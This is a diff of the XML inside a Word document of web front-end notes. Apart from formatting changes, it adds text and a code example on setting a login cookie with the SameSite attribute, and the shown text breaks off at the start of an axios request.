+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -12527,7 +15475,16 @@
       </w14:textFill>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="13">
+  <w:style w:type="character" w:styleId="13">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="9"/>
+    <w:uiPriority w:val="0"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+      <w:sz w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="14">
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="1"/>
     <w:qFormat/>

--- a/10.Web前端/02.WebInspect/WebInspect.docx
+++ b/10.Web前端/02.WebInspect/WebInspect.docx
@@ -11705,6 +11705,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
         <w:rPr>
@@ -12674,7 +12675,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>sameSite</w:t>
@@ -12688,7 +12688,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>: a boolean or string indicating whether the cookie is a "same site" cookie (</w:t>
@@ -12703,7 +12702,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>false</w:t>
@@ -12717,7 +12715,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t> by default). This can be set to </w:t>
@@ -12732,7 +12729,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>'strict'</w:t>
@@ -12746,7 +12742,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>, </w:t>
@@ -12761,7 +12756,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>'lax'</w:t>
@@ -12775,7 +12769,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>, or </w:t>
@@ -12790,7 +12783,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>true</w:t>
@@ -12804,7 +12796,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t> (which maps to </w:t>
@@ -12819,7 +12810,6 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>'strict'</w:t>
@@ -12833,10 +12823,1949 @@
           <w:spacing w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:shd w:val="clear" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="8522" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="8522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblLayout w:type="fixed"/>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="108" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8522" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="6A9955"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>// 登录成功，设置cookie</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ctx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>set</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'userId'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>user</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>id</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>, {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>                </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>httpOnly:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>false</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>                </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>sameSite:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'strict'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:vertAlign w:val="baseline"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            });</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:leftChars="200"/>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="8522" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="8522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblLayout w:type="fixed"/>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="108" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8522" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>axios</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>post</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
